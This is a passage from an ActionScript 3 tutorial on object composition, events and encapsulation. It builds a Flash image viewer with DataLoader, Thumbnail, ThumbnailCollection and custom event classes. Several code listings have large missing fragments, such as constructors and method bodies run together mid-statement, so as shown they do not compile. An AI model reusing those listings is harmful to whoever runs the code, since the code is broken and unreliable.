point. In this example, I present two classes, Button101BadIdea, and DocumentClassBadIdea. They are based on the previous Button101 examples, but you will see modifications specifically meant to illustrate the bad technique. I've stripped down both classes, though, in an attempt to bring a little focus to the relevant code. Here is DocumentClassBadIdea package { import flash.display. MovieClip; import flash.text.TextField; import flash.events.MouseEvent; import flash.net.*; public class DocumentClassBadIdea extends MovieClip { private var tf:TextField; private var button1:Button101BadIdea; private var button2:Button101BadIdea; public function DocumentClass() { tf = new TextField(); addChild(tf); tf.text = "Hello World"; button1 = new Button101BadIdea(tf, "You clicked button 1"); button1.x = 10; button1.y = 200; button1.label = "Button 1"; addChild(button1); button2 = new Button101BadIdea(tf, "You clicked button 2"); button2.x = 220; button2.y = 200; button2.label = "Button 2"; addChild(button2); } } } And here is Button101BadIdea: package { import flash.display.Shape; import flash.display.Sprite; import flash.events.MouseEvent; import flash.text.TextField; import flash.text.TextFormat; public class Button101BadIdea extends Sprite { private var bgd:Shape; private var labelField:TextField; private var _clickField:TextField; private var _text:String; public function Button101BadIdea(tf:TextField, text:String) { _clickField = tf; _text = text;); addEventListener(MouseEvent.CLICK, onClick); mouseChildren = false; buttonMode = true; } public function set label(text:String):void { labelField.text = text; } public function get label():String { return labelField.text; } private function onOver(e:MouseEvent):void { bgd.alpha = 0.8; } private function onOut(e:MouseEvent):void { bgd.alpha = 1; } private function onClick(e:MouseEvent):void { _clickField.text = _text; } } } The change is subtle. And if you try this out (look in the download package for the "bad_idea" project), you'll see that it works just fine. But here's what changed: - In DocumentClassBadIdea, on lines 18 and 24, there are two arguments passed to the Button101BadIdeaconstructor, a reference to the TextFieldon the stage, and a bit of text. - We also removed the lines that added a CLICKlistener to the buttons, and the click-listening function. - In Button101BadIdea, on line 16, we're receiving two parameters (the TextFieldand the String), and then storing them in instance properties on the next two lines. - At line 38, we add our own CLICKlistener, to be handled internally. - On lines 55-57, we have the CLICKlistener. This uses those new properties to apply the Stringto the text value of the TextField. Now, if it works, why is it a bad idea? It's usually a pretty subjective thing to deem the correctness of code. On the one hand, if it works, then it can't be that bad. On the other hand, if the code is to be maintained, then the maintainability of the code is just as important being functional. The code presented here is not maintainable. The biggest problem is right here (in Button101BadIdea): _clickField.text = _text; We have just locked our button class into doing one thing and one thing only: putting text into a TextField. Now, granted, it's been set up to use any text and any TextField, but really this button has a very specific purpose. If you ever needed a button to do something else – anything else – you'd be stuck with having to make more button classes. Even if the appearance of the button was to be the same. Step 15: I Can Has Better Solushun? Of course, the better solution was the one already presented in the previous tutorials (see the "button_tutorial" project in the download package if you need a refresher). But what makes it better? For starters, the Button101 class is far more reusable if it doesn't assume that a click should result on putting text into a TextField. If needed, that end result can still be accomplished, but so can any other result. But we achieve the result not within the Button101 object; instead, that logic is in the DocumentClass object. Or, more generally, that logic is in the object that "owns" the Button101 object. Now, the object that owns the Button101 object can be pretty much any object that requires a button. The need for the button is then followed by the specific end result needed when the button is clicked. And that's the responsibility of the object that needs the button, not the button itself. So what we have, in the original and better solution, is one object that composes another object. The object being composed is rather autonomous, but provides certain public properties and methods with which it can be customized to a degree. The object doing the composing is in control, and manipulates the composed object through its public properties and methods. This relationship is the basic building block of larger applications, and the focus of the remainder of this tutorial. Step 16: The Hierarchy of Composition To enable two-way communication between classes, we need to start thinking in terms of hierarchies of composition. As a rule, if object A composes object B, then the reverse is decidedly not true. I must iterate that, naturally, there are exceptions to this rule. But this particular methodology works well in a vast majority of cases, and fits in nicely with the built-in event system in ActionScript 3. Think of it this way. Your SWF starts with a document object. This object will, among other things, be composed of other objects, such as MovieClip, or objects representing MovieClips. There may even be an object that represents a collection of thumbnails or a grid of buttons. The object may be "owned" by the document object (by "owned," I mean the document object composes the thumb collection object). Now, the thumb collection object might compose more than one thumbnail object, which themselves are composed of a Loader object and a TextField object. Now, does it make sense for the thumb collection object to compose the document object? Or for individual thumbnails to compose the thumb collection object? Is it even possible for a built-in class like Loader to compose a custom class like Thumbnail? A hierarchy of composition starts to become apparent. You'll notice that not only is there a structure to how things are composed, but the objects themselves start at the most grand (the document object) and work their way to more and more specific and focused objects (such as a thumbnail object, or the basic building block of a Loader object). We can illustrate this hierarchy like so: In the above diagram, objects are represented by the boxes with the class names in them. One object composes another if the line connecting ends with a diamond shape at the composing end. That is, in the above illustration, DocumentClass composes Thumbnail, and Thumbnail in turn composes Loader and TextField. Step 17: Embracing Events ActionScript 3 is largely based upon the idea of dispatching and listening for events. I won't get into the basic of events here; you can read up on this ActiveTuts tutorial for more information if you need it. Events are a great way to enable communication (that's pretty much what they're about). Dispatching an event from one object allows pretty much any other object to act in response to it. However, note the difference between executing public methods and handling an event. For instance, imagine object A and object B. Object A can execute any of object B's public methods, and that's one form of communication. If, on the other hand, Object A dispatches and Event for which Object B is listening, then that's another form of communication. But note the difference. The first is active: Object A directly manipulates Object B. The second is passive: Object A merely dispatched an event. Object B may not even be listening, and if it is, Object A has no control over what Object B may do as a result. Step 18: Open Communication So we have a hierarchy of composition. Typically the document object composes the thumb collection object. And because of that relationship, the document object gets to execute public methods on / directly manipulate / actively communicates with the thumb collection object. But the thumb collection doesn't know about the object that "owns" it. Ideally, it would be written in a reusable way so as to allow it to be used by any other object that wants to use a thumb collection. So we can't tie it to any particular document object. But we want the document object to remove its preloader when the thumb collection is all loaded; how does the thumb collection communicate with the document object if it doesn't compose it? As you may have guessed, it does so through events. The thumb collection communicates indirectly / passively with the document object. In fact, it's a bit misleading to say it "communicates with the document object". It's really just saying, into the void, "My images have loaded, in case anyone cares." And thankfully there is someone listening in the void, and they do care, because they will now remove their preloader. In other words, two-way communication is often achieved through a public method in one direction, and through event dispatches in the other. Now, perhaps the most common form of two-way communication that's not the method just described is the ability for a public method to return a value. I would argue that this isn't so much two-way communication as it is a way to get information out of another object. That is, if Object A calls a method on Object B and gets a return value, then Object B may be told to do something, but Object A isn't really expected to do anything in response to getting the value back. It's splitting hairs, and while this maneuver is valuable, it's not our focus here. We'll be picking this apart in a more hands-on approach momentarily, but keep this concept in mind as we build our image viewer. Step 19: Building an Image Viewer Let's roll up our sleeves. First things first, let's get an overview of our project. The final example was shown at the top of the article, so if you forget, trot back there for a moment. This step will be about defining our needs and breaking apart our objects. First, let's write down the objectives - Display a group of thumbnail images - Clicking on a thumbnail image will display a larger version of the image - This will also cause a "selected" state to appear on the thumbnail - Clicking on a "next" or "previous" button will cause the appropriate image to show in the larger area, as well as selecting the appropriate thumbnail - If the user is at the first image in the sequence, the "previous" button will be disabled and display itself as such. Similar action with the "next button" at the end of the sequence. - Clicking on the larger image results in a link to the original image on Flickr - Control which images are shown, and the associated data, through an XML document that is loaded at runtime You may be able to tell, but I was drawing from this particular project in the last few steps with my examples of composition structures. Call it foreshadowing. So this following list of needed classes shouldn't be a total surprise: Document Class "Runs" the SWF. Pulls everything together into a working application ThumbnailCollection Manages a group of Thumbnail objects. Responsible for creation and layout of individual thumbnails, based on incoming data. Also responsible for selecting thumbnails. Thumbnail An individual thumbnail. Acts as a button and loads and displays a image. Can also display a selected state, which can be enabled or disabled through public methods. DetailImage Loads a larger image. Can be clicked, and dispatches that event. Pagination Controls the two PaginationButtons, re-dispatching their CLICK events and managing when they are enabled and disabled. PaginationButton An individual button of the "next" or "previous" variety. Basically just a button, although they can be enabled and disabled, and update their appearance accordingly. DataLoader All of the other classes mentioned so far have been visual; this one is not. It's responsibility is to load the XML file and parse it, and retrieve relevant data when asked. This kind of class tends to feel more foreign to beginning Object-Oriented programmers, but it's no more or less useful than the visual side of things. It's inclusion here is partly to illustrate this point. ImageData A Value Object whose sole purpose is to carry bits of data pertaining to a single image (A "Value Object" is just an object with, typically, a bunch of properties and few if any methods. The point is to collect some bits of information – values – into a single object). ImageChangeEvent We'll need a custom event class in order to package up some useful information along with the event. The event will specifically be when an image should change due to some kind of interaction. With that in mind, let's get started. Step 20: Create the Project We have a good idea of the classes involved, so we can successfully create the project. I'll detail the process using the computer's filesystem and OS, but if you're comfortable with a good project-oriented code editor, such as Flash Builder, FlashDevelop, or TextMate, feel free to create the project using those tools. First, create a project folder. I'll call mine Image Viewer. Inside of this folder, create two more folders, "src" and "bin". "src" will be where we put source files, like FLA files, AS files, and anything else that doesn't need to be deployed to run the final product. "bin" will be where the various files are that get deployed, such as SWF files, XML files, and image files that get loaded by the SWF. Inside of the src folder, make two more folders, "flas" and "classes". We'll only have one FLA file, but we'll aim to organize our project by keeping FLA file separated from AS files. Next, we'll create some folders in classes to be our package structure. Create this structure inside of classes: [source="text"] classes/ data/ events/ ui/ detail/ pagination/ thumbs/ And lastly, create some more folder in bin to help keep that organized. We need folders for xml and images, specifically. [source="text"] bin/ images/ thumbs/ detail/ data/ The final folder structure should look like this: Step 21: Set Up the FLA Now, create a Flash file (ActionScript 3.0, of course) and save it in the src\flas folder. I'm calling mine ImageViewer.fla. Alternately, you can start with the FLA file provided in the download pack, in image_viewier_start. It has graphics in it for the various elements so you don't need to burn time drawing buttons and the like. Even with the starter FLA, we need to set up a few things. Choose the menu item File > Publish Settings…. Make sure the "Formats" tab is selected, and choose a name for your SWF. More importantly, though, is to set the path. We want to go to the bin, so type in ../../bin/ImageViewer.swf. Next, click on the Flash tab, and then on the Settings… button next to ActionScript Version. In here, make sure the Source Path tab is selected, and click on the + button. In the resulting entry, type ../classes/. Setting a relative path for publish paths and document source paths make the project more portable. Resist the temptation to click on the "target" button, as that results in an absolute path to the classes folder. This makes it much harder to move the project to a new location on your hard drive, or to hand to someone else for them to work on on a different machine. Step 22: Create and Set the Document Class Create a new text file and save it as ImageViewer.as in [project]/src/classes/ui. Add the following to the file: package ui { import flash.display.*; import flash.events.*; public class ImageViewer extends Sprite { public function ImageViewer() { trace("Ready.") } } } Note that we need to fill in the package in the class, as we're technically in the ui package. In case you missed it, remember that we don't put classes in the package, as the classes folder is our source path. We start there, but we don't include it as part of the package. In your Flash file, make sure nothing is selected (press Command-Shift-A) and open the Property window. Where it says Class, enter: [source="text"] ui.ImageViewer Remember how the use of packages makes our full class name longer? We need the full name in the document class field, so we need to prepend the short name ( ImageViewer) with the package. Now, if all went well, we'd be able to test the movie at this point and see a trace of "Ready." in the Output panel: At this point, we have a project waiting to be worked on, and we have a document class hooked up to the FLA. We'll soon add more classes, but first, let's get our loadable assets ready. Step 23: Add the Images You can find a number of images ready to use in the download pack. You will find them in image_viewer/bin/images/. You can poke through the files if you want, and you'll probably find them predictably organized. There are thumbnail-sized images in one folder, and there are also larger versions of the same images in another folder. Put the small images in your project's bin/images/thumbs/ and the large images in bin/images/detail/. The images are all culled from Flickr, and are licensed under the Creative Commons. Attributions can be found in the next step, as well as in the final project. If you wish to use your own images, size your thumbnails to 100x100, and your details to 400x300, and just put them in the appropriate folders. Step 24: Create the XML File We'll now catalog those images in an XML document. Flash will consume this file and parse the data it needs out of it. The structure of this file is important for following along with the rest of the tutorial. However, if you've used your own images, be sure to set the content of the XML appropriately. The format is not complex, hopefully you can make the substitutions on your own. Create a new text file, and save it as images.xml in bin/data/. Our XML structure is basically just a single list of image items, an individual node of which looks like this: <image name="flickr.jpg" attribution="Photo by Flickr, available under an attribution license" link="" /> A single image has an image name, an attribution, and a source web page. Seems reasonable, unless you're wondering how we load an image from just an image name. To reduce typing, we'll stick a few attributes in the root node to define the paths to the thumbs and details folders, like so: <images thumbPath="images/thumbs/" detailPath="images/detail/"> What this does is three-fold: - We won't have to type out the full image path for each image, because we'll assume that all images are in the same directory. - We don't have to specify individual paths for the thumbnail and the detail, and instead we rely on the two versions having the same filename, just residing in different directories. - We can easily customize the location of the image folders, if you so desire. Here is the full XML document, populated with data relevant to the images in the download package: <images thumbPath="images/thumbs/" detailPath="images/detail/"> <image name="light-reading.jpg" attribution="Photo by MikeSchinkel, available under a Creative Commons Attribution license" link="" /> <image name="glocal-similarity-map.jpg" attribution="Photo by blprnt_van, available under a Creative Commons Attribution license" link="" /> <image name="brimelows-bathroom.jpg" attribution="Photo by LeeBrimelow, available under a Creative Commons Attribution license" link="" /> <image name="blue-cubes.jpg" attribution="Photo by frankdouwes, available under a Creative Commons Attribution license" link="" /> <image name="right-to-left.jpg" attribution="Photo by modern_carpentry, available under a Creative Commons Attribution license" link="" /> <image name="recursive3.jpg" attribution="Photo by flavouz, available under a Creative Commons Attribution license" link="" /> </images> Step 25: Create the DataLoader Class We get to start right in with our first non-document class, and it's a non-visual one, as well. Begin by creating a new text document, and saving it as DataLoader.as in src/classes/data/. Now, as this is not a visual class, there's definitely no need to extend Sprite or MovieClip. However, we do need to dispatch events, so it will be beneficial to extend EventDispatcher. Here is our first pass at the code, which is moderately complex. The individual techniques used herein should not be new to you, so I won't belabor the loading and handling of XML. There is a brief walkthrough after the code, though. package data { import flash.events.*; import flash.net.*; public class DataLoader extends EventDispatcher { private var _xml:XML; public function DataLoader(src:String) { var loader:URLLoader = new URLLoader(new URLRequest(src)); loader.addEventListener(Event.COMPLETE, onXmlLoad); loader.addEventListener(IOErrorEvent.IO_ERROR, onXmlError); } private function onXmlLoad(e:Event):void { _xml = new XML(e.target.data); dispatchEvent(new Event(Event.COMPLETE)); } private function onXmlError(e:IOErrorEvent):void { trace("There was a problem loading the XML file: " + e.text); } } } In short, the DataLoader object loads an XML file and stores the file as XML once it loads. To get it to load, we need to pass in a URL to the XML document to the constructor. The load starts, and the conversion of raw text into an XML object is handled by the COMPLETE listener. There is also a simple error handler, which will spit out some useful information to the Output panel, but more than anything prevents an IOError from disrupting the program if something bad does happen. Step 26: Integrate the DataLoader into the Application With our DataLoader class created (even if it's not finished), we can go ahead and use it. This is a nice way to work: start with a minimal program (such as a FLA and an almost-empty document class), add one object that's barely functional, make sure it works, add functionality, test, repeat. By not typing too much, we can minimize errors. Our frequent tests make it more obvious where errors were introduced, and by starting with zero functionality we progress in complexity in an organic way. At any rate, go back to the ImageViewer class and have it create and use the DataLoader: package ui { import flash.display.*; import flash.events.*; import data.DataLoader; public class ImageViewer extends Sprite { private var _imageData:DataLoader; public function ImageViewer() { _imageData = new DataLoader("data/images.xml"); _imageData.addEventListener(Event.COMPLETE, onImageDataLoad); } private function onImageDataLoad(e:Event):void { trace("Data loaded."); } } } Test it out, and you should see a single trace, indicating that the data has finished loading. Step 27: Analyzing the DataLoader Now, let's look at the choices that we made when designing things so far. First, we chose to have the DataLoader contain its raw XML in a private property, and we have not written a public getter for it. The reasons for this is to encapsulate the raw data. Our next steps will involve writing some specialized methods to access the data, so we'll be continuing this discussion, but the main point is that we want an object to be responsible for maintaining the data. By restricting public access to the raw XML, we can control how the data is accessed. Not only that, but by writing methods to retrieve data, we can – at a later point – change the underlying mechanism of how the data is structured without the need to update multiple class files in response to that change. We would only need to update the DataLoader class. Second, we have the DataLoader handle it's own error events. Now, realistically, if errors were to be an actual issue (for instance, if you were loading XML from another domain which may be inaccessible beyond your control), you'd want to handle things a little more elaborately. But for our purposes, we're pretty confident that the XML is going to load. In the case that it doesn't (say, we misspelled the file name), we would get the error event. If the error event isn't handled (that is, there is no listener for the URLLoader's IOErrorEvent.IO_ERROR event), then a runtime error is triggered. By hooking up something, we can at least prevent against disruption to the execution of the program. But the point is that we handle this event internally, so that, when we create the DataLoader in the document class, we don't have to worry about that error so much. The DataLoader is a bit more of black box, encapsulating the internal mechanism of the load. Finally, we chose to dispatch a COMPLETE event once the XML file loads and is converted into an XML object. This does two things for us. First, by dispatching our own event, as opposed to letting the document class listen directly to the URLLoader's COMPLETE event, we can ensure that the event is our COMPLETE event. That is, it's not enough that the external file has loaded. We also want to make sure we have an XML object instantiated. So we dispatch the event when we're ready, after the XML is stored. The more important thing that the COMPLETE event accomplishes is the opportunity for two-way communication. It'll work like this: The document class creates a new DataLoader, effectively communicating with it to load a certain file. When the file is loaded, the DataLoader dispatches the COMPLETE event, in a sense communicating with the document class so that it proceed with the rest of its logic. But this is a subtle point, and I'll continue to point it out: while the document class communicates directly the DataLoader, giving it a specific file to load, the DataLoader merely dispatches an event. The document class may or may not be listening, as far as the DataLoader is concerned. At this point, DataLoader could be used in a completely different project, provided we wanted to utilize an XML file with the same structure. We have here our first composition hierarchy. The document composes the DataLoader and works with it directly, while the DataLoader is more vague in its communication and simply dispatches events. Don't forget, though, that even at this point there is another level of composition, as the DataLoader composes URLLoader and XML objects. Step 28: Add a Data Accessor Method Let's give DataLoader a way to expose the underlying data. However, as discussed in the previous step, we'll avoid exposing the XML object and instead create data accessor methods as we need them. In DataLoader, add the following method: public function getThumbnailPaths():Array { var paths:Array = []; var srcList:XMLList = _xml.image.@name; var thumbPath:String = _xml.@thumbPath; for each (var src:String in srcList) { paths.push(thumbPath + src); } return paths; } If you're unfamiliar with standard parsing of XML with E4X, then you might want to brush up on that, as we'll be doing similar things in the coming steps. The point I want to focus on is that we have created a method that will parse the XML for us, and simply return a list of paths to the thumbnail images. This separates the responsibilities of the objects: The document class is merely going to want that list of paths and not be mired down in the details of parsing the XML for that information. Conversely, the DataLoader class is all about the details of the XML structure and qualified to parse it; so let's put the logic where it belongs. Step 29: Use the Data Accessor Method Back in ImageViewer, let's use that getThumbnailPaths method we just created. Modify the onImageDataLoad method to look like this: private function onImageDataLoad(e:Event):void { var thumbPaths:Array = _imageData.getThumbnailPaths(); trace(thumbPaths.join("\n")); } This doesn't add much functionality for now, but it does print out something more interesting than before. You should see a list of full paths to the thumbnail images: This illustrates that our getThumbnailPaths method is working, and also that we're using the composed object by directly calling methods on it. Step 30: Create a Thumbnail Class Our next step would be to pass this thumbPaths data to the ThumbnailCollection class so that it can then do its job of managing multiple, individual Thumbnail objects. Obviously, to get it to work, we kind of need to develop the Thumbnail class at the same time. We'll start with the Thumbnail class and then "connect" the document class to the Thumbnail objects through the ThumbnailCollection object. Keep in mind that it doesn't really work that way; the document class will have no knowledge of the individual Thumbnails because they'll be encapsulated by the ThumbnailCollection. And vice versa, because we'll be dispatching events from Thumbnail to ThumbnailCollection, which will then re-dispatch events as necessary back to the document class. With that in mind, let's build a Thumbnail class. Create a new text file and save it as Thumbnail.as in classes/ui/thumbs/. Add the following code to the class:.mouseEnabled = false; _highlight.alpha = .8; } public function deselect():void { _container.addEventListener(MouseEvent.ROLL_OVER, onOver); _container.addEventListener(MouseEvent.ROLL_OUT, onOut); ; } public function get container():ThumbnailGraphic { return _container; } } } All in all, a moderately complex class, but nothing terribly advanced. A few points of clarification: The ThumbnailGraphic class is, if you haven't spotted it yet, a class provided by the FLA as a symbol that has been exported for ActionScript. So, there is no class file for it (although, conceivably, we could have actually made the exported class the Thumbnail class, but our focus is on composition, so rather than extending a DisplayObject we're composing one). We use a Loader object to handle the loading of and display of an image. We're handling the complete and error events. The error event is a basic trace. The complete handler is a little more involved. However, it's all about merely displaying the loaded image within an 100 x 100 square. If the image is larger than that, then the resulting calculations on the scrollRect will crop the image to the center. If it's smaller, then the image will get centered. This isn't a substitute for not cropping your thumbnail images properly, but it does help prevent unsightly bleeds in the event of user error when providing images. The mouse hover is straightforward enough, using the highlight frame found within the Flash symbol. Feel free to church it up here, and implement a tween using TweenMax or Tweener or the animation package of your choosing. Animations always add a nice feel to most pieces, but I'll remove the tangent for my purposes. A CLICK event has been hooked up, but we'll leave the logic of the listener for the time being. The select and deselect methods will get used a bit further down the line. But we're setting them up here. The idea is that a selected Thumbnail will have the highlight on it (at bit more "solid" of an alpha setting), but also be non-interactive at that point. This will prevent clicks on the same Thumbnail in a row, and keep the highlight from acting unexpectedly. deselect just reverses everything that makes a Thumbnail objected selected. There is a getter for the container property, which is an instance of the ThumbnailGraphic symbol. This provides access to the display object that will need to be positioned and added to the stage. Being a public function, we'll be seeing this again in the next step as we write the ThumbnailCollection class. We'll be coming back to this class later, but for now let's turn our attention to the ThumbnailCollection class. Step 31: Write the ThumbnailCollection Class The ThumbnailCollection class is, again, responsible for managing multiple Thumbnail objects. Make another text file, and save it as ThumbnailCollection.as in /classes/ui/thumbs. Here's our initial code to put in: package ui.thumbs { import flash.display.*; import flash.events.*;; _thumbnails[index] = thumb; } public function get container():Sprite { return _container; } } } You might think of this class as a glorified Array. Its main function is to house a collection of Thumbnail objects (hence the name of the class), and it does so in an Array. But it also protects that Array. If we use a ThumbnailCollection object (and we will, in the next step), then we need to trust that it will do its job at managing the collection, and thus we don't have direct access to that Array. We can add items to the Array indirectly, through addThumbAt, but that's about it. Not to mention that that method also does a bunch of other things to create a Thumbnail. Step 32: Use the ThumbnailCollection Object Let's put that all together and see what we can do. Back in ImageViewer, we'll create a ThumbnailCollection instance and populate it using the list of thumb paths from DataLoader. package ui { import flash.display.*; import flash.events.*; import data.DataLoader; import ui.thumbs.ThumbnailCollection; public class ImageViewer extends Sprite { private var _imageData:DataLoader; private var _thumbnails:ThumbnailCollection; public function ImageViewer() { _imageData = new DataLoader("data/images.xml"); _imageData.addEventListener(Event.COMPLETE, onImageDataLoad); _thumbnails = new ThumbnailCollection(); addChild(_thumbnails.container); _thumbnails.container.y = 300; } private function onImageDataLoad(e:Event):void { var thumbPaths:Array = _imageData.getThumbnailPaths(); for (var i:uint = 0; i < thumbPaths.length; i++) { _thumbnails.addThumbAt(thumbPaths[i], i); } } } } At this point, our composition hierarchy looks like this (a line with a diamond on it means that the class on the diamond side is composing the class at the other end of the line): Note that ImageViewer is composing the ThumbnailCollection, and therefore calls methods on in directly. But also notice that the DataLoader and ThumbnailCollection are completely independent of each other (successful encapsulation), yet can cooperate through the mediation of the ImageViewer. Again, the higher-level objects tend to compose the more focused objects, and therefore have knowledge of them. The other side of the coin, though, is that the more focused objects tend to not know anything about the objects composing them, and instead provide the service of dispatching events. OK, at this point, we should be able to make it work! Test the movie, and instead of traces, we should see some images show up along the bottom of the SWF. You should also be able to interact with the thumbnails, getting that highlight to show up on mouse over. Step 33: A Custom Event We're going to handle a click on a Thumbnail object. The individual CLICK needs to be detected on the Thumbnail itself, then dispatched out to the ThumbnailCollection object. From there, it determines the index of the Thumbnail that was clicked and redispatches a custom event. ImageViewer will be listening for this event, and use it to determine what happens next. Let's start with the custom event class. It's going to be a standard Event, only it has a spot for an value property. This will be determined by ThumbnailCollection and used by ImageViewer. Our custom event will also define some custom event types. Create another new text file and save it as ImageChangeEvent in classes/events/. This will be a typical Event subclass, which we haven't talked about specifically up to now. Full discussion after the code: package events { import flash.events.*; public class ImageChangeEvent extends Event { public static const INDEX_CHANGE:String = "indexChange";; } } } First, this class is in the events package. It's not required, but it's common to place your custom events in an events package. This keeps them grouped together, as well as conceptually separating them from the other classes. A custom event, just like a regular event, should be extremely lightweight and not dependent on too much to get its job done. Putting events in their own package reinforces the notion that this is an event that can be dispatched from, technically, any object in the project, not just, say, the objects in the thumbs package (this is foreshadowing, by the way. We'll be dispatching this event again, mark my words). Next we need to import the built-in events package, specifically Event, because we extend Event. We're using inheritance here because we pretty much only have one choice. In order to create a custom event, we have to subclass Event. Just the way it goes. The first few lines of the class itself are properties. There is a public static constant, which defines a String that is an event type. Our event will actually only define this one type for now, but it's not uncommon to list several of these types here. This gives us an event type like ImageChangeEvent.INDEX_CHANGE, not unlike something like Event.COMPLETE or MouseEvent.CLICK. The other property is just a private instance variable, in which we'll store the index value of the image to which we're changing. The constructor is fairly typical for an Event subclass. The type, bubbles, and cancelable parameters are simply transferred to the super constructor. We just need to make sure we do that. The bit of custom work, and really the whole point of creating a custom event, is the value parameter. That's our own addition, so we store that in our instance property and pass the rest of the parameters to the super class. The next two methods are overrides of methods in the super class. It's not strictly necessary to do this, but it's not a bad idea. The clone method provides an easy way to create an identical copy of a given event. This is generally as simple as creating a new event object using the values stored within the original event, and returning it. The toString method lets us provide informative output if the event ever gets traced. We take advantage of the super class's formatToString method, and just pass in the name of the class and any properties we want to include in the output. We'll see this in action in just a little bit. Lastly, there is a public getter for the _value property. This provides a read-only property. But this property is going to be extremely useful in our program. Nothing to test here, so let's move on to actually using this event object. Step 34: Clicking an Image So far, we've done pretty well just writing up whole classes and getting them to work together. Our next task involves smaller changes across multiple classes, so pay attention. We'll start in the Thumbnail, where we'll first listen for a normal CLICK event on the ThumbnailGraphic, and then simply re-dispatch that event. First, add the CLICK event listener: public function Thumbnail() { _container = new ThumbnailGraphic(); _container.addEventListener(MouseEvent.ROLL_OVER, onOver); _container.addEventListener(MouseEvent.ROLL_OUT, onOut); _container.addEventListener(MouseEvent.CLICK, onClick); _container.mouseChildren = false; // ... Also take it into account in the select and deselect methods:; } And then write the listener function: private function onClick(e:MouseEvent):void { dispatchEvent(e); } Turning to ThumbnailCollection, we need to make sure we listen for CLICK events on all Thumbnails, and then dispatch an ImageChangeEvent as a result, after looking up the index of the event-causing Thumbnail. First, import the ImageChangeEvent: import events.ImageChangeEvent; Then, in the addThumbAt method, make sure to listen for CLICK events: public function addThumbAt(url:String, index:uint):void { var thumb:Thumbnail = new Thumbnail(); thumb.load(url); _container.addChild(thumb); thumb.x = 100 * index; thumb.addEventListener(MouseEvent.CLICK, onThumbClick); _thumbnails[index] = thumb; } And lastly write the event handler. This bit might take a little explanation: private function onThumbClick(e:MouseEvent):void { var thumb:Thumbnail = e.target as Thumbnail; var index:int = _thumbnails.indexOf(thumb); dispatchEvent(new ImageChangeEvent(ImageChangeEvent.INDEX_CHANGE, index)); } The code is actually rather simple, but here's the gist: First, grab the event target and cast it as a Thumbnail. This gives us the Thumbnail object that was clicked. Then, look up the index in the _thumbnails array of that object. The indexOf method does exactly that: it returns the array index of the the object passed into the method. Finally, using that index, we create a new ImageChangeEvent which we then dispatch. One last thing to do, and that's to listen for and handle ImageChangeEvents in ImageViewer. In that class, import the ImageChangeEvent: import events.ImageChangeEvent; Then we need an instance property to hold onto the image index we've chosen (the reasons for which will be clearer in the near future): private var _currentImageIndex:int; And then update the code to listen for the event in the constructor:); } Finally, we need to write that event-listening method. We'll get to more interesting code in the next step, but for now let's write out the method and trace the index: private function onImageChange(e:ImageChangeEvent):void { _currentImageIndex = e.value; trace("image changed. index: " + _currentImageIndex); } That was a lot of editing, but actual code added was just a handful of lines. Just keep telling yourself that this is all in the name of the hierarchy of composition. And we should be able to test it now! Go ahead and run the movie, and click on the thumbnails. You'll see the index of the thumbnail you clicked on show up in the Output panel. For your reference, here are the complete listings of the code so far for the three affected classes: ImageViewer package ui { import flash.display.*; import flash.events.*; import data.DataLoader; import events.ImageChangeEvent; import ui.thumbs.ThumbnailCollection; public class ImageViewer extends Sprite { private var _imageData:DataLoader; private var _thumbnails:ThumbnailCollection;; trace("image changed. index: " + _currentImageIndex); } } } ThumbnailCollection package ui.thumbs { import flash.display.*; import flash.events.*; import events.ImageChangeEvent;; thumb.addEventListener(MouseEvent.CLICK, onThumbClick); _thumbnails[index] = thumb; } public function get container():Sprite { return _container; } private function onThumbClick(e:MouseEvent):void { var thumb:Thumbnail = e.target as Thumbnail; var index:int = _thumbnails.indexOf(thumb); dispatchEvent(new ImageChangeEvent(ImageChangeEvent.INDEX_CHANGE, index)); } } } Thumbnail.addEventListener(MouseEvent.CLICK, onClick); ; } private function onClick(e:MouseEvent):void { dispatchEvent(e); } public function get container():ThumbnailGraphic { return _container; } } } Step 35: Encapsulate Image Data in a Value Object To get image data from the DataLoader, it would be convenient to bundle up all of the necessary information (remember, an node contains name, attribution, and link attributes) in a single object. We could use a regular old object, like this: {name:"name", attribution:"Attributed to John", link:""} But this is a tutorial about Object-Oriented Programming, so we're going to add another class. The responsibility will be solely to contain the properties associated with an image. This will be a very simple class, but it will provide us with a strongly-typed value we can use to pass around this information. Create a new text file, and save it as ImageData.as in classes/data/. Add this code: package data { public class ImageData { public var source:String; public var attribution:String; public var link:String; public function ImageData(source:String, attribution:String, link:String) { this.source = source; this.attribution = attribution; this.link = link; } } } The class exists to provide three properties. This means we can transfer the data from the node in the XML to an ImageData object. While we were writing the class, we also added a convenience to the constructor: pass in three arguments, and get those properties set for you. So we can create an ImageData object with one line, like this: new ImageData("path/to/image.jpg", "Attributed to John", ""); Now, even though this is a very simple class, why go to the trouble and not just use the regular Object? The advantage is datatyping and strict compile time error checking. If you have a variable typed as an Object, there isn't any way for the compiler to know that source is or isn't a valid property of the variable, or that it is or isn't a String. Our ImageData class, however, has only three valid properties, each with its own proper datatype. The compiler will catch unintentional misuses of the object by producing errors. Not only that, but philosophically, we can think in terms of objects throughout the application. Even something as simple as "data about an image" can represented as an object, and thus we can create a class for just this purpose. Step 36: Querying the Data for Details Well, we have an index. We've managed to get the index of the Thumbnail that was clicked, but now what? We need to go back to the data to get more information relating to the index. Basically, we want all information – as an ImageData object – that is associated with the index that we have. Open up DataLoader and add this method: public function getImageByIndex(index:int):ImageData { var imageNode:XML = _xml.image[index]; if (imageNode) { return new ImageData(_xml.@detailPath + imageNode.@name, imageNode.@attribution, imageNode.@link); } else { return null; } } Remember, a single node looks like this: <image name="flickr.jpg" attribution="Photo by Flickr, available under an attribution license" link="" /> This method is actually rather simple. We take the index that was passed in and use it to find the matching node in the XML data. Then we take that node and get the attributes out of it. With those values, we create an ImageData object and return it. However, note the check to see if the node exists; if we've passed in an out-of-bounds index, we won't have valid data in the XML, so we can't return a valid ImageData object. This is a simple check that can prevent errors down the line, in the rare event that we'll need it. Put this method to the test by using it in ImageViewer. Start by importing the ImageData class: import data.DataLoader; import data.ImageData; import events.ImageChangeEvent; import ui.thumbs.ThumbnailCollection; In the onImageChange method, we can remove the trace and query the DataLoader for the relevant information. private function onImageChange(e:ImageChangeEvent):void { _currentImageIndex = e.value; updateImage(_currentImageIndex); } private function updateImage(index:uint):void { var img:ImageData = _imageData.getImageByIndex(index); trace("image name: " + img.source); } We'll also pull the logic for doing something with this index into a new method. At the moment, it might seem like overkill to do so, but we'll need to do it later, so I'm using my crystal ball and saving us a little overhead by making the method now. Test the movie, and you should see a relevant trace when clicking on thumbnails. Step 37: Detail Image Now let's turn our attention to the detail image area. As a reminder, the goal here is to load an image, display an attribution, and navigate to a URL when the image 